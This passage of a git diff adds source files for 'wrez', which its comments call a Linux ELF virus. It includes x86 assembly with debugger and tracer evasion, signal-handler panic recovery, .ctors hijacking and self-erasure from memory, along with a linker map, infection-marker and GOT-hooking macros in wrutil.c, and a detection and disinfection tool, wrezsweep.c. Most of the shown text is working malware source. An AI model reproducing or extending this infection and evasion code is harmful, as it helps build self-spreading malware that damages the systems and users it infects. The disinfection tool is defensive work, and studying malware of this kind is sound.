+        pop     esi                     ; Restore source offset
+
+        jmp     main_loop
+
+lenght_1:
+        mov     cl, 4                   ; Get 4 bits of data for position
+        cdq                             ; Fix-up value 
+        inc     edx                     ; (dx = 1)
+
+        call    get_data                ; Get data
+
+        jmp     c_copy
+
+; Get one bit of data
+; Returns:
+;     CF - Value of the bit
+
+gb_next_byte:
+        lodsb                           ; Get one byte
+        mov     ah, 1                   ; Mark the end of data
+        xchg    ebp, eax                ; Move it to bp
+
+get_bit:
+        shr     ebp, 1                  ; Get bit to CF
+        jz      gb_next_byte            ; No more bits left in dx?
+        ret
+
+; Get huffman-coded number
+; Returns:
+;     bx - The number
+
+get_huffman:
+        mov     cx, word [esp + pusha_size + 4 + 8] ; hl1stuff, Assume 3 bits for the number
+        cdq                             ; Fix-up value
+        inc     edx                     ; (dx = 1)
+
+        call    get_bit                 ; Get huffman bit
+        jnc     get_data                ; Was 0 -> Values were correct
+
+        mov     cl, byte [esp + pusha_size + 8 + 8]     ; hl2stuff
+        mov     dl, byte [esp + pusha_size + 12 + 8]    ; hf2stuff
+
+
+; Get n bits of data
+; Input:
+;     cx - Number of bits wanted
+;     dx - Fix-up value to be added to the result
+; Returns:
+;     bx - The requested number
+
+get_data:
+        xor     ebx, ebx
+
+gd_loop:
+        call    get_bit                 ; Get bit
+        rcl     ebx, 1                  ; Store it
+        loop    gd_loop                 ; Loop
+        add     ebx, edx                ; Fix the value
+
+        ret
+
+decompressor_end:
+data_start:
+
+; ============= everything below this line is compressed ===============
+
+rinit:  ; &wrcfg is pushed on stack now
+
+        ; find tracer signature on stack
+        xor     eax, eax
+        mov     ebx, 0x494a4b4c
+        mov     ecx, ('cart' ^ 0x494a4b4c)
+        mov     esi, esp
+        cld
+
+trl0:   lodsb
+        xor     al, bl
+
+        cmp     eax, ecx
+        jnz     cont0
+        jmp     wrez_escape     ; escape virus
+
+cont0:
+        ; increase sliding seed
+        ; ecx = ecx ^ (a ^ b)
+        ; a = seed_old
+        ; b = seed_new = (seed_old << 8) | ((seed_old & 0xff) + 1)
+        mov     edx, ebx
+        shl     ebx, 8
+        mov     bl, bh
+        inc     bl
+        xor     edx, ebx
+        xor     ecx, edx
+
+        shl     eax, 8
+
+        ; obfuscated compare with 0xc0000000
+        bsf     edx, esi        ; edx = 0x1e = 0001.1110b
+        ror     edx, 0x5
+        jnc     trl0
+
+%if 0
+        ; ok, most likely there is no [sl]trace running on us
+        ; now check for gdb or any ptrace-using bugger
+        call    pphdlr
+        mov     [0xbffffffc], byte 0xff
+        int3                    ; cause SIGTRAP
+
+        call    aphdlr
+
+        cmp     [0xbffffffc], byte 0x00
+        jne     wrez_escape
+
+        ; infection part
+        call    rentry
+        jmp     wrez_escape
+
+aphdlr: push    byte 0x0        ; SIG_DFL
+        jmp     phdlr
+
+pphdlr: call    phdlr
+        ; real SIGTRAP handler
+shdlr:  mov     [0xbffffffc], byte 0x00
+        ret
+
+phdlr:  pop     ecx
+        push    byte 0x05
+        pop     ebx             ; signum = SIGTRAP
+        push    byte 0x30
+        pop     eax             ; __NR_signal
+        int3
+        int     0x80            ; signal (SIGTRAP, shdlr);
+        ret
+%endif
+
+        ; install SIGSEGV and SIGILL handler
+        pop     ebp             ; &wrcfg
+        call    psigillsegv
+
+; signal handler itself
+sigillsegv:
+        mov     esi, esp
+        and     esi, 0xfffffff0
+spl0:   lodsd
+        cmp     eax, 'mark'
+        jne     spl0
+
+        lodsd                   ; address of real panic handler
+        mov     [esp + 64], eax
+        ret
+
+
+psigillsegv:
+        pop     ecx
+        push    ecx
+        push    byte 4
+        pop     ebx             ; signum = SIGILL
+        push    byte 0x30
+        pop     eax             ; __NR_signal
+        int     0x80            ; signal (SIGTRAP, shdlr);
+
+        pop     ecx
+        push    byte 11
+        pop     ebx
+        push    byte 0x30
+        pop     eax
+        int     0x80
+
+        pusha
+        push    esp
+        call    ppanic
+
+; when signal is caught, it redirects execution here, so this is the
+; panic handler
+panic:  mov     esi, esp
+        and     esi, 0xfffffff0
+pl0:    lodsd
+        cmp     eax, 'mark'
+        jne     pl0
+        lodsd
+        lodsd                   ; old stack pointer
+        mov     esp, eax
+        popa
+
+        sub     esp, 0x20 + 12  ; simulate as if we just return from rentry
+        push    ebp
+        push    0x0             ; simulate return value of 0 of wrez_main
+        jmp     wrez_cleanout
+
+ppanic: push    dword 'mark'
+
+; signal handlers are installed now and the stack looks like this:
+; <lower> .... 'mark' addr esp pusha-array .... <higher>
+; where addr is the address to continue in case of panic
+
+        push    ebp             ; &wrcfg
+        call    rentry
+
+        push    eax             ; save return value
+
+wrez_cleanout:
+        ; get rid of installed signal handlers
+        push    byte 0x00
+        pop     ecx
+        push    byte 4
+        pop     ebx
+        push    byte 0x30
+        pop     eax
+        int     0x80            ; signal (SIGILL, SIG_DFL);
+        push    byte 0x00
+        pop     ecx
+        push    byte 11
+        pop     ebx
+        push    byte 0x30
+        pop     eax
+        int     0x80            ; signal (SIGSEGV, SIG_DFL);
+
+        pop     eax             ; return value of wrez_main
+
+        ; escape. either called on panic or when the virus code has been
+        ; successfully executed destroy virus signature in memory
+wrez_escape:
+        pop     ebp             ; pop wrcfg parameter given to rentry
+
+        ; since we survived, lets pop stack guards
+        add     esp, 12 + 0x20; 'mark', &panic, saved-esp and pusha array
+
+        mov     ebx, [esp + 0x20 + 4]   ; retaddr
+        mov     edx, [ebx]              ; instruction at retaddr
+        and     edx, 0x00000700         ; get n: 83 c_n_ fc
+        shr     edx, 8 - 2              ; >> 8, * 4
+        mov     esi, esp
+        add     esi, 0x20 - 4
+        sub     esi, edx
+        mov     edi, [esi]      ; old .ctors, exact begin of virus
+
+        ; FIXME: make a reliable way of either storing edx or edx +4, depending on
+    ;        the code that will be executed just after the ret below. see
+        ;        wrcore.c:700
+        mov     edx, dword [ebp + (wr_oldctors - wrcfg)]
+        mov     [esi], edx              ; overwrite ctors walk register
+
+        ; decide what to do with the virus, based on the return value of
+        ; wrez_main:
+        ;    0: erase virus from memory
+        ; != 0: continue without erasing
+
+        or      eax, eax
+        jz      do_erase
+
+        ; int3
+        popa
+        popf
+        ret
+
+do_erase:
+        push    edi             ; point to return to with last 'ret'
+
+        ; now compute the length to zero off
+        mov     ecx, [ebp + (wr_start - wrcfg)]
+        sub     ecx, edi                ; ecx = length of poly-stub
+        add     ecx, wrez_len - 5       ; 5 bytes instruction
+        add     ecx, [ebp + (cmprlen - wrcfg)]          ; + cmprlen
+
+        ; store the zero'ing opcodes
+        cld
+        mov     eax, 0x9d61aaf3
+        stosd
+
+        mov     al, 0xc3                ; 'ret'
+        stosb
+
+        xor     eax, eax        ; overwrite with NUL (al = \x00)
+
+        ret
+
+rentry: align   16,db 0x90      ; avoid non-executeable ld-generated alignment
+
+        ; wrez_main starts directly at this place
+
diff --git a/other/wrez/wrez.bin b/other/wrez/wrez.bin
new file mode 100755
index 0000000..c32f11f
--- /dev/null
+++ b/other/wrez/wrez.bin
diff --git a/other/wrez/wrez.bin.conf b/other/wrez/wrez.bin.conf
new file mode 100644
index 0000000..fb7772f
--- /dev/null
+++ b/other/wrez/wrez.bin.conf
@@ -0,0 +1,3 @@
+configrel 5
+skip 259
+compress 3866:14:7:10:129
diff --git a/other/wrez/wrez.bin.out b/other/wrez/wrez.bin.out
new file mode 100644
index 0000000..41c2994
--- /dev/null
+++ b/other/wrez/wrez.bin.out
diff --git a/other/wrez/wrez.map b/other/wrez/wrez.map
new file mode 100644
index 0000000..92ba85b
--- /dev/null
+++ b/other/wrez/wrez.map
@@ -0,0 +1,53 @@
+
+Memory Configuration
+
+Name             Origin             Length             Attributes
+*default*        0x00000000 0xffffffffffffffff
+
+Linker script and memory map
+
+                0x06660000                . = 0x6660000
+
+.text           0x06660000     0x16b0
+ wrez.o(.text)
+ .text          0x06660000      0x200 wrez.o
+                0x06660103                decompressor_end
+                0x06660000                wrez_init
+                0x06660005                wrcfg
+                0x06660042                decompressor_start
+                0x06660103                data_start
+ wrcore.o(.text)
+ .text          0x06660200      0xaa9 wrcore.o
+                0x06660200                wrez_main
+ lime-interface.o(.text)
+ *fill*         0x06660ca9        0x3 00
+ .text          0x06660cac       0x27 lime-interface.o
+                0x06660cac                lime_generate
+ lime.o(.text)
+ *fill*         0x06660cd3        0xd 00
+ .text          0x06660ce0      0x9cd lime.o
+                0x06660e68                lime
+ *(.text)
+ *(.rodata)
+ .rodata        0x066616ad        0x2 wrcore.o
+ *(.data)
+ *fill*         0x066616af        0x1 00
+
+.rel.dyn
+
+/DISCARD/
+ *(.bss)
+ *(.eh_frame)
+ *(.comment)
+ *(.note)
+OUTPUT(wrez elf32-i386)
+
+.debug_abbrev
+
+.debug_info
+
+.debug_line
+
+.debug_pubnames
+
+.debug_aranges
diff --git a/other/wrez/wrez.o b/other/wrez/wrez.o
new file mode 100644
index 0000000..c8931bd
--- /dev/null
+++ b/other/wrez/wrez.o
diff --git a/other/wrez/wrezdefs.h b/other/wrez/wrezdefs.h
new file mode 100644
index 0000000..c6a77c7
--- /dev/null
+++ b/other/wrez/wrezdefs.h
@@ -0,0 +1,2 @@
+#define WREZ_CFG_START 0x00000005
+#define WREZ_SIZE 5808
diff --git a/other/wrez/wrezdefs.inc b/other/wrez/wrezdefs.inc
new file mode 100644
index 0000000..abafd24
--- /dev/null
+++ b/other/wrez/wrezdefs.inc
@@ -0,0 +1 @@
+wrez_len equ 5808
diff --git a/other/wrez/wrezsweep.c b/other/wrez/wrezsweep.c
new file mode 100644
index 0000000..08561a6
--- /dev/null
+++ b/other/wrez/wrezsweep.c
@@ -0,0 +1,578 @@
+/* wrezsweep - wrez detection and removal tool
+ * not to be distributed, ever.
+ */
+
+#define VERSION "0.2"
+
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <elf.h>
+
+
+int isinfected (char *pathname, int disinfect);
+int ctors_seek (FILE *fp, unsigned int ofs_low, unsigned int ofs_high,
+        unsigned int ctors_act, unsigned int opc_mask,
+        unsigned int opc_value);
+unsigned int ctors_getold (unsigned char *virus);
+
+
+int     verbose = 0;
+int     ctors_fromheader = 0;
+char *  virus_outname = NULL;
+
+
+void
+usage (char *progname)
+{
+        fprintf (stderr, "usage: %s [-h] [-x] [-D] [-v] [-d virus] \\\n"
+                "\t\t<file1 [file2 [...]]>\n"
+                "\n", progname);
+        fprintf (stderr, "options\n"
+                "\t-h\t\tthis help\n"
+                "\t-x\t\ttry to fix/disinfect file\n"
+                "\t-D\t\tuse alternate original-ctors detection code\n"
+                "\t-v\t\tverbose mode\n"
+                "\t-d virus\tdump virus code to file 'virus'\n"
+                "\n");
+
+        exit (EXIT_FAILURE);
+}
+
+
+int
+main (int argc, char *argv[])
+{
+        char    c;
+        char *  progname = argv[0];
+        char ** oargv = argv;
+        int     disinfect = 0;
+
+
+        printf ("wrezsweep - version "VERSION"\n\n");
+
+        if (argc < 2)
+                usage (progname);
+
+        while ((c = getopt (argc, argv, "hxDvd:")) != EOF) {
+                switch (c) {
+                case 'h':
+                        usage (progname);
+                        break;
+                case 'x':
+                        disinfect = 1;
+                        break;
+                case 'D':
+                        ctors_fromheader = 1;
+                        break;
+                case 'v':
+                        verbose = 1;
+                        break;
+                case 'd':
+                        virus_outname = optarg;
+                        break;
+                default:
+                        usage (progname);
+                        break;
+                }
+        }
+
+        if (optind == argc)
+                usage (progname);
+
+        if (verbose) {
+                printf ("scanning %d files\n", argc - optind);
+                if (disinfect)
+                        printf ("disinfection enabled\n");
+        }
+
+        printf ("===================================================="
+                "==========================\n");
+
+        for ( ; optind < argc ; ++optind) {
+                printf ("FILE %s\n", oargv[optind]);
+
+                isinfected (oargv[optind], disinfect);
+        }
+
+        exit (EXIT_SUCCESS);
+}
+
+
+/* 0 clean
+ * 1 infected
+ * -1 error
+ */
+
+int
+isinfected (char *pathname, int disinfect)
+{
+        int             retval = -1;
+        FILE *          fp = NULL;
+        long int        fp_ofs; /* temporary file offset */
+        long int        fp_len; /* victim file size */
+
+        off_t           fp_new_end;
+        unsigned char * slide_data = NULL;
+        unsigned int    slide_len;
+        FILE *          fpv;
+        unsigned char * virus = NULL;
+        int             n;
+        Elf32_Ehdr      veh;
+        Elf32_Shdr      seh;
+        Elf32_Shdr      sh[32], /* temporary */
+                        bss,    /* .bss section header table entry */
+                        ctors;  /* .ctors section */
+        int             ctors_seen = 0;
+        Elf32_Phdr      ptl1,   /* 1rst PT_LOAD segment header */
+                        ptl2;   /* 2nd PT_LOAD segment header */
+        long int        ptl2_ofs;       /* file offset of header */
+        int             vlen_sanity;    /* odd stuff */
+        unsigned int    vlen;   /* virus length */
+        unsigned int    vlen_filesz,
+                        vlen_addmem,
+                        vlen_virtual,
+                        vlen_offset;
+        unsigned int    old_ctors,
+                        vir_ctors;
+        unsigned int    new_displ,
+                        ph_lastphys;
+
+
+        fp = fopen (pathname, "rb");
+        if (fp == NULL) {
+                perror ("fopen");
+                return (-1);
+        }
+
+        if (fread (&veh, sizeof (veh), 1, fp) != 1) {
+                perror ("fread Elf32_Ehdr");
+                goto bail;
+        }
+
+        if (veh.e_ident[EI_MAG0] != ELFMAG0 ||
+                veh.e_ident[EI_MAG1] != ELFMAG1 ||
+                veh.e_ident[EI_MAG2] != ELFMAG2 ||
+                veh.e_ident[EI_MAG3] != ELFMAG3)
+        {
+                if (verbose)
+                        printf ("   no ELF file\n");
+                goto bail;
+        }
+
+        if (veh.e_type != ET_EXEC || veh.e_machine != EM_386)
+                goto bail;
+
+        if (veh.e_shoff == 0) {
+                if (verbose)
+                        printf ("   section header table offset is zero\n");
+
+                goto bail;
+        }
+
+        if (fseek (fp, veh.e_shoff, SEEK_SET) != 0) {
+                perror ("fseek e_shoff");
+                goto bail;
+        }
+
+        /* walk sections, until .bss is reached. because .bss is always at the
+         * end of the second PT_LOAD segment, we can expect our virus to be
+         * after .bss
+         */
+        memset (&bss, '\0', sizeof (bss));
+        for (n = 0 ; n < veh.e_shnum && n < 32 ; ++n) {
+                if (fread (&sh[n], sizeof (sh[0]), 1, fp) != 1) {
+                        perror ("fread Elf32_Shdr");
+
+                        goto bail;
+                }
+
+                /* when .bss is found, copy it
+                 */
+                if (sh[n].sh_type == SHT_NOBITS)
+                        memcpy (&bss, &sh[n], sizeof (bss));
+
+                /* check for .ctors section
+                 */
+                if (ctors_seen == 0 &&
+                        sh[n].sh_type == SHT_PROGBITS &&
+                        sh[n].sh_size == 8 &&
+                        sh[n].sh_flags == (SHF_WRITE | SHF_ALLOC))
+                {
+                        ctors_seen = 1;
+                        memcpy (&ctors, &sh[n], sizeof (ctors));
+                }
+        }
+
+        if (bss.sh_type != SHT_NOBITS) {
+                if (verbose)
+                        printf ("   .bss section not found\n");
+                goto bail;
+        }
+
+        if (veh.e_phoff == 0) {
+                if (verbose)
+                        printf ("   segment header table offset is zero\n");
+                goto bail;
+        }
+        if (fseek (fp, veh.e_phoff, SEEK_SET) != 0) {
+                perror ("fseek e_phoff");
+                goto bail;
+        }
+
+        for (n = 0 ; n < veh.e_phnum ; ++n) {
+                if (fread (&ptl2, sizeof (ptl2), 1, fp) != 1) {
+                        perror ("fread Elf32_Phdr");
+                        goto bail;
+                }
+
+                if (ptl2.p_type == PT_LOAD && ptl2.p_flags == (PF_W | PF_R)) {
+                        ptl2_ofs = ftell (fp) - sizeof (ptl2);
+                        break;
+                } else if (ptl2.p_type == PT_LOAD) {
+                        memcpy (&ptl1, &ptl2, sizeof (ptl1));
+                }
+        }
+        if (n == veh.e_phnum) {
+                if (verbose)
+                        printf ("   2nd PT_LOAD segment not found\n");
+                goto bail;
+        }
+
+        vlen = ptl2.p_offset + ptl2.p_memsz;
+        vlen -= bss.sh_offset + bss.sh_size;
+
+        /* XXX: there are some weird files, where the end of .bss is past the
+         *      memsz of the data PT_LOAD segment. strange.
+         */
+        vlen_sanity = vlen;
+        if (vlen_sanity < 0)
+                goto bail;
+
+
+        if (vlen == 0) {
+                if (verbose)
+                        printf ("CLEAN: %s\n", pathname);
+
+                retval = 0;
+                goto bail;
+        }
+
+        vlen_filesz = ptl2.p_offset + ptl2.p_filesz;
+        vlen_filesz -= bss.sh_offset + bss.sh_size;
+        vlen_addmem = vlen - vlen_filesz;
+        vlen_virtual = bss.sh_addr + bss.sh_size;
+        vlen_offset = bss.sh_offset + bss.sh_size;
+
+        printf ("WARNING: file \"%s\", possible infection detected !\n"
+                "         memory: %u bytes at 0x%08x\n"
+                "           file: %u (+%u mem) bytes at 0x%08x\n",
+                pathname,
+                vlen, vlen_virtual, vlen_filesz, vlen_addmem,
+                vlen_offset);
+
+        /* read virus into memory, and optionally dump it to file for further
+         * analysis
+         */
+        if (fseek (fp, vlen_offset, SEEK_SET) != 0) {
+                perror ("fseek virus offset");
+                goto bail;
+        }
+
+        virus = calloc (1, vlen_filesz);
+        fread (virus, vlen_filesz, 1, fp);
+
+        if (virus_outname != NULL) {
+                if (verbose)
+                        printf ("DUMPING virus region (0x%x to 0x%x, "
+                                "%d bytes) to \"%s\"\n", vlen_offset,
+                               vlen_offset + vlen_filesz, vlen_filesz,
+                               virus_outname);
+
+                fpv = fopen (virus_outname, "wb");
+
+                if (fpv == NULL) {
+                        perror ("fopen virus");
+
+                        goto bail;
+                }
+
+                /* skip .ctors entry, only write real virus code
+                 */
+                fwrite (virus + sizeof (unsigned int),
+                        vlen_filesz - sizeof (unsigned int), 1, fpv);
+                fclose (fpv);
+        }
+
+        fclose (fp);
+        fp = NULL;
+
+        if (disinfect == 0) {
+                retval = (vlen == 0) ? 0 : 1;
+                goto bail;
+        }
+
+        /* for disinfection, open the file read/write
+         */
+        fp = fopen (pathname, "r+b");
+        if (fp == NULL) {
+                perror ("fopen disinfection");
+                
+                goto bail;
+        }
+
+        /* first patch the original .ctors. this will deactivate the virus
+         * code, even if we fail to later remove it cleanly from the file
+         */
+        vir_ctors = vlen_virtual;
+        old_ctors = ctors_getold (virus);
+
+        if (old_ctors != 0xffffffff)
+                old_ctors -= 4; /* returns +4 since crt0.o walks downwards */
+
+        if (ctors_seen) {
+                if (ctors.sh_addr != old_ctors) {
+                        printf ("DISINFECTION WARNING: original .ctors "
+                                "addresses differ\n");
+                        printf ("   .ctors section header: 0x%08x\n"
+                                "     ctors from wrconfig: 0x%08x\n",
+                                ctors.sh_addr, old_ctors);
+                }
+
+                if (ctors_fromheader) {
+                        if (verbose)
+                                printf ("   overriding .ctors address\n");
+
+                        old_ctors = ctors.sh_addr;
+                }
+        }
+
+        if (old_ctors == 0xffffffff) {
+                printf ("DISINFECTION WARNING: either not wrez or its "
+                        "polymorph\n");
+                printf ("   manually disinfect it (virus start: 0x%08x)\n",
+                        vir_ctors);
+                printf ("   or override ctors disinfection using the '-D' "
+                        "option\n");
+
+                goto bail;
+        }
+
+        printf ("DISINFECTING\n"
+                "   old   ctors address: 0x%08x\n"
+                "   virus ctors address: 0x%08x\n", old_ctors, vir_ctors);
+
+        if (ctors_seek (fp, ptl1.p_offset, ptl1.p_offset + ptl1.p_filesz,
+                vir_ctors, 0xf8, 0xb8))
+        {
+                printf ("FAILURE: cannot find viral ctors address in "
+                        "crt0.o\n");
+
+                goto bail;
+        }
+        
+        fp_ofs = ftell (fp);
+
+        if (verbose) {
+                printf ("   found virus ctors activation code within crt0.o "
+                        "at: 0x%08lx\n", fp_ofs);
+        }
+
+        /* overwrite first address (%ebx load), then search for the second
+         * one, immediatly after it (offset + 64 bytes)
+         */
+        if (fwrite (&old_ctors, sizeof (old_ctors), 1, fp) != 1)
+                goto bail;
+
+        if (ctors_seek (fp, fp_ofs, fp_ofs + 64, vir_ctors, 0, 0)) {
+                printf ("FAILURE: cannot find second viral ctors address "
+                        "in crt0.o\n");
+
+                goto bail;
+        }
+
+        if (verbose)
+                printf ("   found second virus ctors activation code "
+                        "at: 0x%08lx\n", ftell (fp));
+
+        if (fwrite (&old_ctors, sizeof (old_ctors), 1, fp) != 1)
+                goto bail;
+
+        if (verbose)
+                printf ("   restored old ctors address\n");
+
+        printf ("   disabled virus activation, viral code is still in file, "
+                "though\n");
+
+        /* try to remove viral code from file
+         */
+        if (fseek (fp, 0, SEEK_END) != 0)
+                goto bail;
+
+        fp_len = ftell (fp);
+        slide_len = fp_len - (ptl2.p_offset + ptl2.p_filesz);
+        new_displ = vlen_filesz + bss.sh_size;
+
+        if (verbose)
+                printf ("   sliding 0x%x bytes at the end of file (0x%x "
+                        "bytes forward)\n", slide_len, new_displ);
+
+        slide_data = calloc (1, slide_len);
+        if (fseek (fp, fp_len - slide_len, SEEK_SET) != 0)
+                goto bail;
+
+        if (fread (slide_data, slide_len, 1, fp) != 1) {
+                perror ("fread slide-data");
+                goto bail;
+        }
+
+        /* seek to end of old PT_LOAD segment and slide file end there
+         */
+        if (fseek (fp, bss.sh_offset, SEEK_SET) != 0)
+                goto bail;
+
+        if (fwrite (slide_data, slide_len, 1, fp) != 1) {
+                perror ("fwrite slide-data");
+                goto bail;
+        }
+
+        fp_new_end = bss.sh_offset + slide_len;
+        fflush (fp);
+        ftruncate (fileno (fp), fp_new_end);
+
+        ph_lastphys = ptl2.p_offset + ptl2.p_filesz;
+        if (veh.e_shoff > ph_lastphys) {
+                veh.e_shoff -= new_displ;
+                if (fseek (fp, 0, SEEK_SET) != 0)
+                        goto bail;
+                if (fwrite (&veh, sizeof (veh), 1, fp) != 1)
+                        goto bail;
+        }
+
+        /* repair second PT_LOAD header
+         */
+        ptl2.p_filesz -= new_displ;
+        ptl2.p_memsz -= vlen;
+        if (fseek (fp, ptl2_ofs, SEEK_SET) != 0)
+                goto bail;
+        if (fwrite (&ptl2, sizeof (ptl2), 1, fp) != 1)
+                goto bail;
+
+        /* and fixup all slided sections
+         */
+        if (fseek (fp, veh.e_shoff, SEEK_SET) != 0)
+                goto bail;
+
+        for (n = 0 ; n < veh.e_shnum ; ++n) {
+                if (fread (&seh, sizeof (seh), 1, fp) != 1) {
+                        perror ("fread fixup Elf32_Shdr");
+                        goto bail;
+                }
+
+                if (seh.sh_offset > ph_lastphys) {
+                        seh.sh_offset -= new_displ;
+                        if (fseek (fp, - sizeof (seh), SEEK_CUR) != 0)
+                                goto bail;
+                        if (fwrite (&seh, sizeof (seh), 1, fp) != 1)
+                                goto bail;
+
+                        if (verbose)
+                                printf ("   section %d fixed\n", n);
+                }
+        }
+
+        printf ("   successfully removed viral code from file\n");
+
+bail:   if (fp != NULL)
+                fclose (fp);
+
+        if (virus != NULL)
+                free (virus);
+        if (slide_data != NULL)
+                free (slide_data);
+
+        return (retval);
+}
+
+
+/* ctors_seek
+ *
+ * seek within file `fp', between byte offset `ofs_low' and `ofs_high' for
+ * the unaligned 32 bit unsigned number `ctors_act'
+ *
+ * return 1 on failure
+ * return 0 on success, seek fp to the &ctors_act position
+ */
+
+int
+ctors_seek (FILE *fp, unsigned int ofs_low, unsigned int ofs_high,
+        unsigned int ctors_act, unsigned int opc_mask,
+        unsigned int opc_value)
+{
+        long            ofs;
+        unsigned char   dopcode;
+        unsigned char   rbuf[4];
+        unsigned int *  rbp;
+
+
+        if (verbose)
+                printf ("   scanning for 0x%08x in: [0x%x - 0x%x]\n",
+                        ctors_act, ofs_low, ofs_high);
+
+        /* we do not have to optimize this with streaming buffers, since
+         * the FILE buffers do that, better than we ever can ;)
+         */
+        if (fseek (fp, ofs_low, SEEK_SET) != 0)
+                goto bail;
+        memset (rbuf, '\x00', sizeof (rbuf));
+
+        for (ofs = ofs_low ; ofs <= (ofs_high - sizeof (unsigned int)) ;
+                ofs = ftell (fp))
+        {
+                dopcode = rbuf[0];
+                dopcode &= opc_mask;
+
+                if (fread (rbuf, sizeof (rbuf), 1, fp) != 1)
+                        goto bail;
+
+                /* compare with given address
+                 */
+                rbp = (unsigned int *) &rbuf[0];
+                if (*rbp == ctors_act && dopcode == opc_value) {
+                        if (fseek (fp, ofs, SEEK_SET) != 0)
+                                goto bail;
+
+                        return (0);
+                }
+
+                if (fseek (fp, ofs + 1, SEEK_SET) != 0)
+                        goto bail;
+        }
+
+bail:
+        return (1);
+}
+
+
+unsigned int
+ctors_getold (unsigned char *virus)
+{
+        virus += sizeof (unsigned int); /* new ctors */
+
+        /* kludge, skip until call opcode
+         */
+        while (virus[2] != 0xe8)
+                return (0xffffffff);
+
+        virus += 2;
+
+        virus += 1 + sizeof (unsigned int);     /* skip opcode + imm32 */
+
+        /* virus points to wrconfig structure now
+         */
+        return (((unsigned int *) virus)[2]);
+}
+
+
+
diff --git a/other/wrez/wrutil.c b/other/wrez/wrutil.c
new file mode 100644
index 0000000..6e68df9
--- /dev/null
+++ b/other/wrez/wrutil.c
@@ -0,0 +1,306 @@
+
+
+/* infection marker macros
+ * INFECTED_SET will increase the value to a infection marker size
+ * INFECTED_IS will check for the marker
+ *
+ * FIXME: INFECT_PERCENT macro does not work. for some reason gcc assigns
+ *        a static variable to the values for division. uhm.
+ */
+#if 0
+#define INFECT_PERCENT  ((unsigned int) 90)
+#define INFECT_PADUP    ((unsigned int)(400 / (100 - INFECT_PERCENT)))
+#endif
+
+/* false positive rates (slipped through when infecting)
+ *
+ * INFECT_PADUP | rate of virgin executeables falsely detected as infected
+ * -------------+---------------------------------------------------------
+ *   0x4        | 100.0 %
+ *   0x8        |  50.0 %
+ *  0x0a        |  40.0 %
+ *  0x10        |  25.0 %
+ *  0x14        |  20.0 %
+ *  0x20        |  12.5 %
+ *  0x28        |  10.0 %
+ *  0x40        |   6.25 %
+ *  0x50        |   5.0 %
+ *  0x80        |   3.125 %
+ *  0xc8        |   2.0 %
+ * 0x100        |   1.5625 %
+ * 0x190        |   1.0 %
+ * 0x200        |   0.78125 %
+ */
+
+#define INFECT_PADUP    0xc8
+#define INFECTED_SET(isize) \
+{ \
+        (isize) += INFECT_PADUP - ((isize) % INFECT_PADUP); \
+}
+
+#define INFECTED_IS(isize) \
+        (((isize) % INFECT_PADUP) == 0)
+
+
+/* STRINGPTR macro to create a const string directly within the code.
+ * the string 'string' is assigned to the char * 'dst'. do not use it
+ * twice if you need the same string, but copy the resulting pointer,
+ * as each use of the macro dupes the string. use as this:
+ *
+ *      char * foo;
+ *      STRINGPTR(foo,"bar");
+ */
+#define STRINGPTR(dst,string) \
+{ \
+        register unsigned char * regtmp; \
+        \
+        __asm__ __volatile__ ( \
+                "       call    l0_%=\n\t" \
+                "       .asciz  \""##string"\"\n\t" \
+                "l0_%=: popl    %%eax\n\t" \
+                : "=a" (regtmp)); \
+\
+        (dst) = regtmp; \
+}
+
+
+/* STATICPTR macro creates a fixed amount of space right where it is used,
+ * and loads the pointer 'dst' to point to the first byte of the space.
+ * use like this:
+ *
+ *     void *   data;
+ *     STATICPTR (data, "256");
+ *
+ * would reserve 256 bytes of data.
+ */
+#define STATICPTR(dst,lenstr) \
+{ \
+        register unsigned char * regtmp; \
+        \
+        __asm__ __volatile__ ( \
+                "       call    l0_%=\n\t" \
+                "       .fill   "##lenstr", 1, 0x0\n" \
+                "l0_%=: popl    %%eax\n\t" \
+                : "=a" (regtmp)); \
+\
+        (dst) = regtmp; \
+}
+
+
+/* the following three macros are used to redirect function calls and to
+ * retrieve the absolute address of virus-functions.
+ *
+ * do not put a colon ';' after using the CHAINSTRUCT macro.
+ */
+
+#define CHAINSTRUCT(arraylen) \
+struct { \
+        void *          chain;  /* address to chain call to */ \
+        void *          any;    /* transport pointer for user data */ \
+        unsigned int    gotcount; \
+        unsigned int *  gotloc[arraylen];       /* .got entry address */ \
+} * cstr;
+
+
+/* FUNCPTR, computes the absolute address for a function, based on relative
+ * data only. use like this:
+ *
+ *      unsigned int    my_write_addr;
+ *      FUNCPTR (my_write_addr, "my_write");
+ */
+/*
+                "l0_%=: movl    ($"##functionname" - $l0_%=), %%eax\n" \
+*/
+
+#define FUNCPTR(dst,functionname) \
+{ \
+        register unsigned int   fptr; \
+        \
+        __asm__ __volatile__ ( \
+                "       call    l0_%=\n" \
+                "l0_%=: movl    $"##functionname", %%eax\n" \
+                "       subl    $l0_%=, %%eax\n" \
+                "       popl    %%edx\n" \
+                "       addl    %%edx, %%eax\n" \
+                : "=a" (fptr) : : "edx"); \
+        \
+        (dst) = (void *) fptr; \
+}
+
+
+/* PTRINSTALL, macro to work together with PTRCONTROL. see wrcore.c for
+ * usage example
+ *
+ * hook = function pointer to hook function (your function)
+ * chain = function pointer to original function (old function)
+ * any = (void *) for your needs, accessible through chainstruct->any
+ * gotarray = (Elf32_Word *arr[]), pointer to array of GOT locations
+ * gotcount = elements used in array, must be at least one
+ */
+
+#define PTRINSTALL_ARRAY(hook,chain,any,gotarray,gotcount) \
+{ \
+        __asm__ __volatile__ ( \
+                "       call    l0_%=\n" \
+                "lr_%=: jmp     lo_%=\n" \
+                "l0_%=: pushl   %%ecx\n" \
+                "       pushl   $"##gotcount"\n" \
+                "       pushl   %%ebx\n" \
+                "       pushl   %%edx\n" \
+                "       pushl   $0x64466226\n" \
+                "       jmpl    *%%eax\n" \
+                "lo_%=:\n" \
+                : : "a" (hook), "c" (gotarray), "d" (chain), "b" (any)); \
+}
+
+/* convenience macro for one got entry only (most commonly required)
+ */
+#define PTRINSTALL(hook,chain,gotloc,any) \
+        PTRINSTALL_ARRAY(hook,chain,any,&gotloc,"1");
+
+
+/* PTRCONTROL, macro to be placed at the beginning of a hook function. works
+ * together with PTRINSTALL.
+ *
+ * FIXME: the $lp_%= and $l1_%= instructions put the absolute address, which
+ *        is not what we want. it works still, because we don't access them,
+ *        and only do relative computations. but we waste memory and expose
+ *        the original linking address because of this. fix it. also the
+ *        FUNCPTR macro is having the same weakness
+ */
+
+#define PTRCONTROL(chainstr,arraylen) \
+{ \
+        __asm__ __volatile__ ( \
+                "       jmp     l0_%=\n" \
+                "lp_%=: .fill   3, 4, 0x0\n" \
